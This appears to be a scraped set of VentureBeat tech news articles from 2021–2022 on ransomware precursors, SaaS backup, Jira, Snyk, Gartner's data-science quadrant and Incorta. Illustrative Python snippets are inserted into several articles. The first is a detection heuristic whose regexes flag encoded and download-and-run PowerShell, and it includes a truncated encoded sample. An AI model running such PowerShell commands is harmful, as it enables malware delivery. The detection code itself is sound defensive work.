Ransomware is almost always the eventual payload delivered by earlier-stage malicious software or activity; if you detect the threats that deliver the ransomware, you stop the ransomware before it arrives. So, how do you detect those threats? Focus on the techniques that adversaries are most likely to leverage. Of the top 10 threats Red Canary observed in 2021, 60% are ransomware precursors (i.e., threats that’ve been known to deliver ransomware as a follow-on payload). More staggering is that a full 100% of the top ATT&CK techniques have been used during an attempted ransomware infection. As an example, a significant plurality of ransomware infections involve the use of a command and control (C2) product called Cobalt Strike — Red Canary’s second-ranked threat. Cobalt Strike, in turn, leverages ATT&CK techniques like PowerShell, Rundll32, Process Injection, Obfuscated Files or Information and DLL Search Order Hijacking, all of which are in the top 10. If you develop broad detection coverage for those techniques, then you’ve got a great shot at detecting Cobalt Strike and preventing ransomware infections. The report is based on analysis of the more than 30,000 confirmed threats detected across Red Canary’s customer base in 2021. Read the full report by Red Canary. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. 
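Broad coverage for techniques like the ones named above often starts with simple command-line heuristics. The patterns below are simplified illustrations, not Red Canary's actual detection logic; only the ATT&CK technique IDs (T1059.001 for PowerShell, T1218.011 for Rundll32) are real.

```python
import re

# Illustrative sketch: flag process command lines that match heuristics
# for two frequently abused techniques. Patterns are deliberately crude.

HEURISTICS = {
    # PowerShell launched with an encoded or download-and-run payload
    "T1059.001 PowerShell": re.compile(
        r"powershell(\.exe)?\s.*(-enc|-encodedcommand|downloadstring)", re.I),
    # rundll32 invoked with no DLL argument at all, a common abuse pattern
    "T1218.011 Rundll32": re.compile(r"rundll32(\.exe)?\s*$", re.I),
}

def flag(command_lines):
    hits = []
    for cmd in command_lines:
        for technique, pattern in HEURISTICS.items():
            if pattern.search(cmd):
                hits.append((technique, cmd))
    return hits

telemetry = [
    "powershell.exe -EncodedCommand SQBFAFgA...",  # invented sample payload
    "rundll32.exe",
    "notepad.exe report.txt",
]
print(flag(telemetry))  # flags the first two, ignores notepad
```

The point of the report is that detections like these fire well before any files are encrypted, which is what makes precursor coverage so valuable.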
"
15,114
2,021
"Rewind acquires BackHub to extend its automated SaaS data backups to GitHub | VentureBeat"
"https://venturebeat.com/2021/02/11/rewind-acquires-backhub-to-extend-its-automated-saas-data-backups-to-github"
"Rewind acquires BackHub to extend its automated SaaS data backups to GitHub Cloud infrastructure spending has gone through the roof during the pandemic, due in large part to the rapid embrace of remote work. This has benefited SaaS businesses that operate in the cloud, like Shopify, which has quadrupled in valuation over the past year. But as more businesses flock to the cloud, the need to protect all their valuable data becomes more pronounced. Against this backdrop, Canadian back-up-as-a-service (BaaS) company Rewind today announced that it’s expanding its coverage to include GitHub, the largest source code host on Earth, by acquiring Germany-based BackHub. Terms of the deal were not disclosed. Rewind raised its first notable outside funding less than a month ago, securing $15 million in a series A round led by Inovia Capital. 
Get backup Founded in Ottawa, Canada in 2015, Rewind currently offers data backup and copy services for businesses running Shopify, BigCommerce, and Intuit Quickbooks. While such SaaS platforms have their own systemwide data backup tools in case of catastrophes that would impact all users, they don’t typically offer this to customers at an account level. This division is what’s known as a “shared responsibility model,” where the platform owner assumes some of the responsibility for the infrastructure security and disaster recovery while users take on other aspects, such as managing permissions and password security and ensuring they create backups of all the data that goes into their account. This is essentially what Rewind handles. BackHub, which was founded in Berlin in 2014, is a relatively lean bootstrapped outfit with just three employees, including founder and CEO Daniel Heitz, who will now join Rewind as a senior product manager. Rewind will continue to offer BackHub through the startup’s own website and the GitHub marketplace, with the same pricing structure, which starts at $12 per month for up to 10 repository backups. Above: BackHub Despite its fairly low-profile status, BackHub claims some 1,000 customers, though it was only at liberty to reveal one: MailOnline, the global news website belonging to U.K. newspaper The Daily Mail. Compliance and risk It can be easy to assume all your SaaS data is safe because of a platform’s robust infrastructure and security, but there are many scenarios that make backing up data essential, including compliance obligations and various external and internal risks. 
“Aside from the common sense wisdom of backing up your data in at least two separate systems, many larger customers have to comply with a range of compliance mandates surrounding sensitive data,” Rewind CEO Mike Potter told VentureBeat. “SaaS data is vulnerable to multiple risk vectors: ransomware, human error, disgruntled employees deleting data, misbehaving third-party applications, and so on.” While there are other options for businesses looking to create backups for all their GitHub data, these often entail a significant manual investment and offer limited utility. “Those tools do a good job of extracting the data, but they’re not particularly useful for restoring a code repository in GitHub, which is where the value [in BackHub] really lies,” Potter added. BackHub promises to create a GitHub backup in minutes, including all the metadata associated with each repository, and auto-syncs it to ensure it’s kept up to date. A separate BackHub app helps companies restore all their data immediately, should the need arise, while BackHub can also generate audit logs for enterprise compliance requirements. BackHub works with both private and public repositories, meaning it’s designed for proprietary and open source software (OSS) data backups. Open source intersects with just about every piece of software these days, from scripts that help servers run faster to code that contributes to systems architecture and APIs. Moreover, the pandemic has accelerated open source adoption in the enterprise , and GitHub data suggests 72% of Fortune 50 companies use GitHub Enterprise for their private projects. BackHub was also running an early-stage program to support GitLab and Bitbucket, which will eventually extend Rewind’s coverage even further. Elsewhere, Rewind is in the early stages of introducing additional backup support for Trello, Jira, Zendesk, and Xero. 
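The "backup in minutes, including all the metadata, kept in sync" idea described above boils down to snapshotting each repository's state and only re-backing-up what changed. A minimal sketch, with hypothetical field names loosely modeled on what a source-host API might return:

```python
# Illustrative sketch: snapshot repo metadata alongside the code, then
# diff against the previous snapshot to decide what needs re-syncing.
# Repo shapes are invented for the example.

def snapshot(repos, taken_at):
    return {
        "taken_at": taken_at,
        "repos": {r["name"]: {"pushed_at": r["pushed_at"],
                              "open_issues": r["open_issues"]} for r in repos},
    }

def needs_sync(previous, current_repos):
    """Names of repos that changed (or appeared) since the previous snapshot."""
    prev = previous["repos"]
    return [r["name"] for r in current_repos
            if prev.get(r["name"], {}).get("pushed_at") != r["pushed_at"]]

old = snapshot([{"name": "api", "pushed_at": "2021-02-01", "open_issues": 4}],
               "2021-02-02")
now = [{"name": "api", "pushed_at": "2021-02-10", "open_issues": 6},
       {"name": "docs", "pushed_at": "2021-02-09", "open_issues": 0}]
print(needs_sync(old, now))  # both repos: one changed, one is new
```

The restore side is where the real value lies, as Potter notes: the metadata in each snapshot is what lets a repository be rebuilt in place rather than merely re-downloaded.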
"
15,115
2,021
"Rewind extends SaaS data backup and recovery to Trello | VentureBeat"
"https://venturebeat.com/2021/04/27/rewind-extends-saas-data-backup-and-recovery-to-trello"
"Rewind extends SaaS data backup and recovery to Trello Team communication and collaboration software revealed its true worth over the past 12 months, as businesses across the spectrum rapidly transitioned to remote work. From Zoom to Slack and beyond, companies that weren’t already all-in on the digital workforce were given little choice — it was either sink or swim. However, with cloud spending going through the roof in 2020, a trend that’s set to continue in 2021 and beyond, this opens a Pandora’s box of questions for businesses embracing the giant hard-drive in the sky — how safe is all their data? Privacy issues aside, companies that entrust all their mission-critical information to third-party SaaS companies and clouds need a backup plan if disaster strikes. 
A recent cloud threat report published by Oracle and KPMG found that 75% of organizations in the study had experienced data loss from a cloud service on more than a single occasion. And this is something that Canadian company Rewind is setting out to solve with automated data backup and recovery services for many of the popular SaaS tools of today. Hello Trello Up until now, Rewind offered data backup and recovery for Shopify, BigCommerce, Intuit QuickBooks, and — as of two months ago — GitHub. Today, the company is extending support to Trello, the popular team collaboration and project management platform operated by Atlassian. Above: Rewind: Trello backups It’s worth noting that most SaaS platforms offer their own disaster recovery tools for when a systemwide catastrophe occurs, so if a fire rips through one of their datacenters they can restore all the accounts to their former state from an alternative (backup) datacenter. But this doesn’t work at an individual account level, and the SaaS company typically doesn’t enable customers to recover individual data specific to them on-demand. This is what is widely known as a “shared responsibility” model, where the platform owner (e.g. Trello or GitHub) is responsible for infrastructure-level security and disaster recovery, and the customer is responsible for managing password security, permissions, and backing up all the data in their account. There are various existing methods open to Trello users looking to create backups for their data, such as setting reminders to capture screenshots of boards, exporting JSON or CSV files, or manually creating copies of project boards. Ignoring the significant time and resource drain this creates for companies, the process of restoring the data in these scenarios doesn’t bear thinking about. 
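One reason a raw JSON export is so painful to restore is ordering: a board must exist before its lists, and lists before the cards that reference them. A sketch of that dependency walk, with hypothetical entity shapes loosely modeled on a board export:

```python
# Illustrative sketch: turning a board export into a restore plan that
# satisfies entity dependencies (board -> lists -> cards). The export
# shape here is invented for the example.

def restore_order(export):
    """Yield (entity type, description) in dependency-safe order."""
    plan = [("board", export["name"])]
    for lst in export["lists"]:
        plan.append(("list", lst["name"]))
    for card in export["cards"]:
        # each card points at the list it belongs to via idList
        plan.append(("card", f'{card["name"]} -> {card["idList"]}'))
    return plan

export = {
    "name": "Launch plan",
    "lists": [{"id": "l1", "name": "To do"}, {"id": "l2", "name": "Done"}],
    "cards": [{"name": "Write copy", "idList": "l1"}],
}
print(restore_order(export))
```

Doing this by hand for every board, every time, is the tedium the quote below is describing.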
“The main issue with these types of manual backups is the inability to easily restore data,” Rewind CEO and cofounder Mike Potter told VentureBeat. “Manually backing up data means manually restoring it, which tends to be a slow and tedious process. Manual backups are also frequently forgotten and left out-of-date.” And that, essentially, is the role that Rewind fulfills. It not only creates and stores automated backups of each customer’s Trello instance, it restores it all to its former glory with the click of a button. The integration is available via Trello’s Power-Up marketplace, and it requires no real technical prowess — the full backup and recovery service is accessible via a browser. Above: Rewind: Trello backups, advanced restore Moreover, Rewind backs up individual items of data and all their dependencies and relationships. This includes each Trello board, as well as all the cards (tasks or ideas), lists (collection of cards), labels, custom fields, checklists, and attachments on that board. At launch, however, users can only back up their boards and all the associated entities as a whole package. In the near future, users will also be able to choose on a more granular level, so they can just back up specific cards, lists, or attachments, for example. Native state This all leads us to one lingering question. Why don’t SaaS companies offer such account-level backup services natively? This would surely be a huge selling point, particularly for enterprise clients. “While backups might seem like basic functionality, the fact is that building and continuously supporting a full-featured, scalable backup and restore solution presents non-trivial technical and usability challenges that tend to lie outside the core capabilities of commonly used SaaS platforms,” Potter hypothesized. Moreover, it’s good practice to house backups away from the host platform. 
This isn’t purely for reasons related to natural disasters — how do you access your Trello backup if, for example, you’re locked out of your Trello account? “A true backup gives you full access to your data at all times,” Potter said. “Best practices for data security and business continuity call for the 3-2-1 backup method — three total copies of your data, two of which are local but on different mediums or devices, and at least one copy off-site.” This latest launch comes just a few months after Rewind raised its first notable outside funding, securing $15 million in a series A round led by Inovia Capital. In the future, Rewind said that it plans to extend support to other popular SaaS tools such as Jira, GitLab, Xero, Bitbucket, and Zendesk."
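The 3-2-1 method Potter quotes can be checked mechanically: at least three copies, on at least two different media, with at least one off-site. A minimal sketch, with made-up copy descriptors:

```python
# Illustrative sketch of the 3-2-1 rule: 3 copies, 2 media, 1 off-site.
# The copy descriptors are invented for the example.

def satisfies_3_2_1(copies):
    media = {c["medium"] for c in copies}
    offsite = any(c["offsite"] for c in copies)
    return len(copies) >= 3 and len(media) >= 2 and offsite

plan = [
    {"medium": "saas", "offsite": True},           # live data in the platform
    {"medium": "disk", "offsite": False},          # local export
    {"medium": "cloud-storage", "offsite": True},  # third-party backup service
]
print(satisfies_3_2_1(plan))  # -> True
```

Note that the live SaaS copy only counts if the other copies live outside the host platform, which is exactly the lock-out scenario described above.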
15,116
2,021
"Atlassian's Jira Work Management encourages team collaboration | VentureBeat"
"https://venturebeat.com/2021/04/28/atlassians-jira-work-management-encourages-team-collaboration"
"Atlassian’s Jira Work Management encourages team collaboration At its Team21 conference today, Atlassian unveiled Jira Work Management, a new product built specifically for enterprise teams. The next generation of Jira Core, Jira Work Management is described as a platform that enables marketing, HR, finance, and design employees to connect with their technical counterparts and work together more efficiently. As the pace of change increases, new ways of working are forcing teams to become more agile. Gartner reports that 74% of companies plan to shift some of their employees to remote working permanently. But more than half of remote employees say they feel disconnected from in-office employees, according to an Owl Labs survey, highlighting remote work challenges that must be overcome. 
With Jira Work Management, which was first announced in March, Atlassian aims to enable business customers to take advantage of the capabilities native to its Jira product family. The architecture that Jira Work Management shares with Jira Software and Jira Service Management lets data flow between projects within organizations. This means a request for a website update can pass through designers using Jira Work Management, as well as developers using Jira Software, for example. Above: Atlassian Jira Work Management’s calendar view. “Jira Work Management combines cutting-edge work management capabilities with the power and customizability of Jira to create a new standard for business teams managing projects,” Atlassian product marketing head Chase Wilson said in a blog post. “This is the first Jira built for business teams, by business teams. We crafted this new Jira experience directly with customer design partners of all sizes and industries, as well as internal Atlassian teams of every type — including our own Jira Work Management teams.” Enabling cross-team collaboration Tasks from teams and projects in Jira Work Management can be linked together to reveal dependencies and connections. These links support custom names, allowing employees to create dashboards that report on organization-wide progress. Users can choose from over 35 options, including workload, heat map, filters, and charts, or bring in data with direct integrations. Jira Work Management offers a number of features, including lists, a calendar, and a board that displays tasks from one or more projects. The platform’s timeline feature shows tasks with assignees and statuses, while its forms creator, which is available to licensed Jira Cloud users, lets employees create forms with a drag-and-drop interface. Above: The timeline view in Jira Work Management. 
Beyond this, Jira Work Management offers templates of industry-researched workflows and configurations, each with custom issue types, workflows, and fields. Teams see tasks and issues such as “asset” (in design or marketing use cases) and “candidate” (in recruiting use cases) instead of “stories” and “bugs” (software development). And in place of software-specific functionalities like code, backlog, components, and releases, the left navigation menu in the platform highlights views, forms, and a summary tab for insights. Jira Work Management also offers free automation rules and actions within projects. Teams can select premade rules from a business automation library or create rules for use cases and departments. Atlassian says all of the features are available for every Jira Work Management project on every instance, across every pricing edition — including the free plan. The company adds that over the next six months, Jira Work Management will gain improvements to all of its views, optimized reporting functionality, approvals for sign-off, and new collaboration features."
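The no-code automation idea described above amounts to pairing a trigger condition with an action. A minimal sketch of such a rule engine; the rule and task shapes are hypothetical, not Jira's actual automation schema:

```python
# Illustrative sketch: an automation rule fires an action when a field
# change matches its trigger. Shapes are invented for the example.

rules = [
    {"when": {"field": "status", "becomes": "Done"},
     "then": lambda task: f'notify assignee of "{task["title"]}"'},
]

def on_change(task, field, new_value):
    """Apply a field change and return the actions it triggers."""
    task[field] = new_value
    actions = []
    for rule in rules:
        cond = rule["when"]
        if cond["field"] == field and new_value == cond["becomes"]:
            actions.append(rule["then"](task))
    return actions

task = {"title": "Draft campaign brief", "status": "In Progress"}
print(on_change(task, "status", "Done"))
```

A premade rule library is just a catalog of these trigger/action pairs, which is why non-technical teams can assemble them without writing code.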
15,117
2,021
"Salesforce and Atlassian double down on developer security with $75M Snyk investment | VentureBeat"
"https://venturebeat.com/2021/09/30/salesforce-and-atlassian-double-down-on-developer-security-with-75m-snyk-investment"
"Salesforce and Atlassian double down on developer security with $75M Snyk investment Snyk, the company behind an open source security scanning platform, has extended its series F round of funding by another $75 million. The Boston-headquartered company announced a $530 million investment just a few weeks back at a whopping $8.5 billion valuation. The transaction included both primary and secondary investments, meaning that Snyk had in fact only raised around $300 million in fresh capital. For the extension, which closes the series F round off at $605 million, Snyk has attracted return investments from the venture capital arms of Atlassian and Salesforce, which are now responsible for 10% of Snyk’s $850 million total raised since its inception. 
And for the record, Snyk is now valued at $8.6 billion. By way of a brief recap, Snyk’s SaaS platform helps developers find and fix vulnerabilities — as well as surface license violations — in their open source codebases, containers, and Kubernetes applications. Founded initially out of London and Tel Aviv in 2015, Snyk has amassed an impressive roster of customers in its six-year history, including Google, Salesforce, Intuit, and Atlassian. Strategic Atlassian’s follow-on investment in Snyk is particularly notable, as it comes shortly after Snyk announced a slew of integrations with Bitbucket Cloud and Atlassian Open DevOps, suggesting that Atlassian’s continued backing is as much a strategic move as it is anything else. “Snyk is reinventing the way organizations think about security,” Atlassian’s head of corporate development Chris Hecht said in a statement. “They are a vital part of our ecosystem, tightly integrated into our core products.” "
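At its core, the kind of dependency scanning Snyk performs means comparing a project's pinned versions against advisories for known-vulnerable ranges. A minimal sketch; the package name, advisory, and version range below are entirely made up for the example:

```python
# Illustrative sketch: audit pinned dependencies against a list of
# known-vulnerable version ranges. Advisory data is fabricated.

def parse_version(v):
    return tuple(int(p) for p in v.split("."))

advisories = [
    {"package": "left-pad-ish", "below": "1.2.0", "id": "DEMO-2021-0001"},
]

def audit(dependencies):
    """Return (name, version, advisory id) for each vulnerable pin."""
    findings = []
    for name, version in dependencies.items():
        for adv in advisories:
            if (adv["package"] == name
                    and parse_version(version) < parse_version(adv["below"])):
                findings.append((name, version, adv["id"]))
    return findings

print(audit({"left-pad-ish": "1.1.3", "requests-ish": "2.25.1"}))
```

A real scanner also walks transitive dependencies and maps each finding to a fix version, which is where most of the engineering effort goes.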
15,118
2,021
"Rewind brings data backup and recovery to Microsoft 365 | VentureBeat"
"https://venturebeat.com/2021/12/07/rewind-brings-data-backup-and-recovery-to-microsoft-365"
"Rewind brings data backup and recovery to Microsoft 365 Data backup and recovery platform Rewind is extending support to include Microsoft 365. The announcement comes just a couple of months after the Canadian company raised $65 million, with demand for cloud backup services growing due in large part to the remote work revolution that has driven uptake of SaaS-based online software. Founded out of Ottawa in 2015, Rewind has previously offered data backup services for businesses running Shopify, BigCommerce, Intuit QuickBooks, GitHub, and Trello. As of today, this list also includes Microsoft 365, with data backup and recovery available for Exchange Online, SharePoint, OneDrive for Business, Office 365 Groups, and Microsoft Teams. 
Above: Rewind now provides backup and recovery for Microsoft 365 Get backup While most SaaS platforms provide some disaster recovery and security tools at an infrastructure level so that they can help companies recover from systemwide catastrophes, the customer is ultimately responsible for their data at an individual account level, including password management, permissions, and — crucially — backing up data. By way of example, Microsoft’s very own terms of services specifically recommend using third-party backup services, noting: We strive to keep the Services up and running; however, all online services suffer occasional disruptions and outages, and Microsoft is not liable for any disruption or loss you may suffer as a result. In the event of an outage, you may not be able to retrieve Your Content or Data that you’ve stored. We recommend that you regularly backup Your Content and Data that you store on the Services or store using Third-Party Apps and Service. This is what is known in industry parlance as a “shared responsibility” model, and this is where Rewind comes into play — it’s all about “versioning,” allowing SaaS customers to restore any file or piece of data to a specific date and time. As Rewind looks to extend its reach into the enterprise, the company is also currently preparing data backup and recovery services across other major SaaS products, including HubSpot, Zendesk, GitLab, and Jira, which are expected to start rolling out in 2022. 
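The "versioning" idea boils down to keeping timestamped versions of each item and, on restore, picking the newest version at or before the requested moment. A minimal sketch with invented data:

```python
from datetime import datetime

# Illustrative sketch of point-in-time restore: store timestamped
# versions per item and restore the newest one at or before a target
# date and time. Item and version data are invented for the example.

versions = {
    "budget.xlsx": [
        ("2021-12-01T09:00:00", "v1"),
        ("2021-12-03T17:30:00", "v2"),
        ("2021-12-06T08:15:00", "v3"),
    ],
}

def restore(item, at):
    """Return the payload of the newest version at or before `at`."""
    target = datetime.fromisoformat(at)
    candidates = [(datetime.fromisoformat(ts), payload)
                  for ts, payload in versions.get(item, [])
                  if datetime.fromisoformat(ts) <= target]
    return max(candidates)[1] if candidates else None

print(restore("budget.xlsx", "2021-12-05T12:00:00"))  # -> v2
```

The same lookup works per file, per mailbox, or per record, which is what makes the approach generalize across the SaaS products listed above.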
"
15,119
2,021
"Gartner’s 2021 Magic Quadrant cites 'glut of innovation' in data science and ML | VentureBeat"
"https://venturebeat.com/2021/03/14/gartners-2021-magic-quadrant-cites-glut-of-innovation-in-data-science-and-ml"
"Gartner’s 2021 Magic Quadrant cites ‘glut of innovation’ in data science and ML

Gartner’s Magic Quadrant report on data science and machine learning (DSML) platform companies assesses what it says are the top 20 vendors in this fast-growing industry segment. Data scientists and other technical users rely on these platforms to source data, build models, and use machine learning at a time when building machine learning applications is increasingly becoming a way for companies to differentiate themselves. Gartner says AI is still “overhyped” but notes that the COVID-19 pandemic has made investments in DSML more practical. Companies should focus on developing new use cases and applications for DSML — the ones that are visible and deliver business value, Gartner said in the report released last week. Smart companies should build on successful early projects and scale them.
The report evaluates DSML platforms’ scope, revenue and growth, customer counts, market traction, and product capability scoring. Here are some of the notable findings:

- Responsible AI governance, transparency, and addressing model-based biases are the most valuable differentiators in this market, and every listed vendor is making progress in these areas.
- Google and Amazon are finally competing with Microsoft for supremacy in terms of DSML capabilities in the cloud. Amazon wasn’t even included in last year’s Magic Quadrant because it hadn’t shipped its core product by the November 2019 cutoff date.
- The longest-standing big names in this sector — IBM, MathWorks, and SAS — are still holding their ground and innovating with modern offerings and adaptive strategies.
- Numerous smaller, younger, and midsize vendors are in sustained periods of hypergrowth. The growing size of the market feeds startups at all phases of the data science lifecycle. Gartner observes that growing at the rate of the market actually means growing slowly.
- Alibaba Cloud, Cloudera, and Samsung SDS are included in the Magic Quadrant for the first time.
- The DSML platform software market grew by 17.5% in 2019, generating $4 billion in revenue. It is the second-fastest-growing segment of the analytics and business intelligence (BI) software market behind modern BI platforms, which grew 17.9%. Its share of the overall analytics and BI market grew to 16.1% in 2019.
- The most innovative DSML vendors support various types of users collaborating on the same project: data engineers, expert data scientists, citizen data scientists, application developers, and machine learning specialists.
- There remains a “glut of compelling innovations” and visionary roadmaps, Gartner says.
This is an adolescent market, where vendors are heavily focused on innovation and differentiation, rather than pure execution. Gartner said key areas of differentiation include UI, augmented DSML (AutoML), MLOps, performance and scalability, hybrid and multicloud support, XAI, and cutting-edge use cases and techniques (such as deep learning, large-scale IoT, and reinforcement learning).

Above: Gartner Magic Quadrant for Data Science and Machine Learning Platforms. (Source: Gartner, March 2021)

Data science and machine learning in 2021 and beyond

For most enterprises, the challenge is to keep up with the rapid pace of change in their industries, driven by how fast their competitors, suppliers, and channel partners are digitally transforming their businesses. CIOs and senior management teams want to understand the specifics of how data science and machine learning models work. A top priority for IT executives working with DSML technologies is understanding bias mitigation and how DSML technologies can control for biases on a per-model basis. Designing transparency should start with model and data repositories, providing greater visibility across an entire DSML platform. Enterprises continue to struggle with moving more AI models from pilot to production. According to the 2020 Gartner AI in Organizations Survey, just 53% of machine learning prototypes are eventually deployed to production. Yield rates from the initial model to production deployment show room for improvement. Look for DSML vendors to step up their efforts to deliver modeling apps and platforms that can accept smaller datasets and still deliver accurate results. Open source software (OSS) is a de facto standard with DSML vendors. OSS provides enterprises the opportunity to get DSML projects up and running with little upfront spending. OSS adoption has become so pervasive that most DSML vendors rely on OSS, starting with Python, the most commonly used language.
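As a concrete illustration of the open source stack the report describes, here is a minimal scikit-learn workflow that goes from raw features to a validated model; this is the kind of pipeline DSML platforms wrap with collaboration, governance, and MLOps tooling. The dataset and model choice are arbitrary examples, not anything from the report.

```python
# Minimal open source DSML workflow in Python with scikit-learn:
# split data, fit a preprocessing + model pipeline, and validate it.
from sklearn.datasets import load_iris
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler

X, y = load_iris(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(
    X, y, test_size=0.25, random_state=0
)

# Scaling and model live in one pipeline object, so the exact same
# preprocessing is applied at training and scoring time.
model = make_pipeline(StandardScaler(), LogisticRegression(max_iter=200))
model.fit(X_train, y_train)
accuracy = model.score(X_test, y_test)
```

Everything here is freely available OSS, which is precisely why Gartner notes that organizations can start experimenting with DSML at little upfront cost before graduating to commercial platforms for collaboration and production deployment.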
DSML platform providers also help optimize and curate OSS distributions. For any enterprise to invest in a DSML platform, integration and connectivity are essential. DSML vendors are adopting components for their platform architectures because components are more extensible and can be tailored to an enterprise’s specific needs. Packaged models that integrate into a DSML platform using APIs help enterprises customize machine learning models for specific industry challenges they’re facing. Designing more intuitive interfaces and workflows reduces the learning curve for lines of business and data analysts. Improvements in augmented data science and ML help offload all the data science and modeling work from experienced data scientists to business analysts who prefer to iterate models on their own, often changing constraints based on market conditions. Organizations rely on free and low-cost open source, combined with public cloud providers, to reduce costs while experimenting with DSML initiatives. They are then likely to adopt commercial software to tackle broader use cases and requirements for team collaboration and to move models into production.

Which vendors are leading — and why

Here are some company-specific insights included in this year’s Magic Quadrant: SAS Visual Data Mining and Machine Learning (VDMML) is the market leader, having dominated the Leader quadrant for years in this specific Magic Quadrant. Gartner gives SAS credit for its cloud-native architecture, automated feature engineering and modeling, and domain expertise reflected in its advanced prototyping and production refinement use cases. SAS is often seen as a legacy vendor that’s expensive to implement and support. The customer loyalty SAS has accrued in global enterprises and the priority its development teams place on DSML helps the company maintain dominance in this market. IBM’s Watson Studio ascended into the Leader quadrant this year, up from being considered a Challenger in 2020.
Gartner believes the company’s completeness of vision (horizontal axis of the quadrant) has improved since last year, moving it into the Leader quadrant. This is mainly due to IBM Watson Studio’s multi-persona support, depth of responsible AI and governance, and component structure proving effective for decision modeling. Building on several years of reinventing itself, IBM can deliver an enterprise-class DSML platform that will successfully progress beyond the pilot or proof-of-concept phase. Gartner gives IBM credit for capitalizing on previous successes of SPSS, ILOG CPLEX Optimization Studio, earlier analytics products, and the continual stream of innovations from IBM Research. Alteryx’s strong momentum in the market isn’t reflected in its shift from the Leader quadrant to Challenger. Alteryx powered through last year’s uncertainty, reporting a 19% year-over-year increase in revenue for 2020, reaching $495.3 million. Annual recurring revenue grew 32% year over year to reach $492.6 million. Gartner gives Alteryx credit for supporting multiple personas, a proven go-to-market strategy, and delivering excellent customer service and support. Alteryx has proven to be innovative, despite having that attribute mentioned as a caution in the Magic Quadrant. Amazon SageMaker’s market momentum is formidable, further strengthened by its pace of innovation. In February, Amazon Web Services (AWS) announced it has designed and will produce its own machine learning training chip. AWS Trainium is designed to deliver the most teraflops of any machine learning training instance in the cloud. AWS also announced Trainium would support all major frameworks (including TensorFlow, PyTorch, and MXNet). Trainium will use the same Neuron SDK used by AWS Inferentia (an AWS-designed chip for machine learning inference acceleration), making it easy for customers to get started training quickly with AWS Trainium. AWS Trainium is coming to Amazon EC2 and Amazon SageMaker in the second half of 2021.
Amazon SageMaker comprises 12 components: Studio, Autopilot, Ground Truth, JumpStart, Data Wrangler, Feature Store, Clarify, Debugger, Model Monitor, Distributed Training, Pipelines, and Edge Manager. Google will launch its unified AI Platform in the first quarter of 2021. This is after the cutoff date for evaluation in this Magic Quadrant. It will release key features like AutoML tables, XAI, AI platform pipelines, and other MLOps services. The challenges for DSML platform vendors today begin with balancing the needs for greater transparency and bias mitigation while developing and delivering innovative new features at a predictable cadence. The Magic Quadrant reflects current market reality after updating with four new cloud vendors, one with an extensive ecosystem and proven market momentum. One thing to consider after looking at the Magic Quadrant is that there will be some mergers or acquisitions on the horizon. Look for BI vendors to either acquire or merge with DSML platform providers as the BI market’s direction moves toward augmented analytics and away from visualization."
15,120
2,021
"Incorta nabs $120M to power business data analytics | VentureBeat"
"https://venturebeat.com/2021/06/24/incorta-nabs-120m-to-power-business-data-analytics"
"Incorta nabs $120M to power business data analytics

Incorta, an analytics platform designed to speed up data ingestion, this week announced it has raised $120 million in funding contributed by Prysm Capital, with participation from National Grid Ventures, GV, Kleiner Perkins, M12, Sorenson Capital, Telstra Ventures, Ron Wohl, and Silicon Valley Bank (in the form of a credit facility). CEO Scott Jones says the capital, which brings Incorta’s total raised to $195 million, will be used to expand go-to-market operations and meet demand for Incorta’s analytics products. According to a recent IDC study, 70% of CEOs acknowledge that their organization needs to become more data-driven, with 87% saying becoming more agile and integrated over the next five years is a top priority. Meanwhile, a new study from Ventana Research highlights where companies struggle most with data analytics.
Fifty-five percent of organizations report that the most time-consuming analytics task is preparing the data. According to Ventana, 25% of organizations combine more than 20 sources in their data preparation activities, and 39% use more than 104. Incorta, which was founded in 2014 by Oracle veterans Hichem Sellami, Klaus Fabian, Matthew Halliday, and Osama Elkady, aims to help companies acquire, enrich, analyze, and act upon business data. It can make upwards of tens of billions of rows of data “analytics-ready” without the need to pre-aggregate, reshape, or transform the data in any way, connecting to enterprise apps, data streams, and data files via over 240 integrations.

Above: Incorta’s management dashboard.

“The unprecedented events of the past year highlight the importance of modern data analytics in today’s business environment — platforms and tools like Incorta that deliver data to users directly without costly systems and processes like data warehousing,” Jones said in a press release. “After hitting a major inflection point in 2020, Incorta is now scaling fast to meet global demand for modern data analytics in the cloud.”

Data transformation

Ninety-five percent of businesses cite the need to manage unstructured data as a problem, and 80% to 90% of the data companies generate today is unstructured, according to CIO. Incorta aims to address this by offering an enriched metadata map combined with smart query routing. The result is a repository for analytics and machine learning — one that can be run on-premises, hosted by a cloud provider, or delivered as a fully managed cloud service. Incorta can run as a complete standalone data and analytics pipeline or as a component within a larger analytics and business intelligence tech portfolio, depending on an organization’s data analytics needs.
“Companies have an increasing need to gain insight and make decisions from data with speed and agility, and Incorta provides this mission-critical solution with a differentiated offering,” Prysm Capital partner Muhammad Mian said in a statement. “Prysm is excited to partner with an exceptional management team to support the growth of a product that is at the intersection of attractive long-term trends: the explosion of data, digital and cloud transformation, and business intelligence modernization.” Incorta’s series D follows a year in which nearly 60% of the company’s new revenue came from organic expansion with existing customers across media and entertainment, social, high tech, ecommerce, and retail markets. Incorta recently launched Incorta Mobile, a data analytics experience for mobile devices, as well as initiating partnerships with Microsoft Azure, Google Cloud, eCapital, and Tableau. It has also established a footprint in North America, the Middle East, the U.K., and Japan."
15,121
2,022
"How Incorta uses AI to address supply-chain issues | VentureBeat"
"https://venturebeat.com/2022/01/04/how-incorta-uses-ai-to-address-supply-chain-issues"
"How Incorta uses AI to address supply-chain issues

Prior to this pandemic year of 2021, the term “supply chain” didn’t raise many red flags for most consumers, frankly because they didn’t have to think about it. Everything just happened. Buyers were so accustomed to getting things on schedule that it rarely became a regular topic of conversation. That all changed in the second half of 2021. With the pandemic slowing down production lines and transportation in faraway places, the term “supply chain” is now regularly in headlines. This has been the greatest shock to global supply chains in modern history. Buyers often have to wait months for raw materials, durable goods, building materials, electronic devices, apparel, toys, and numerous other items. At the end of the calendar year, this remains a nagging problem that may continue well into 2022 – or even 2023.
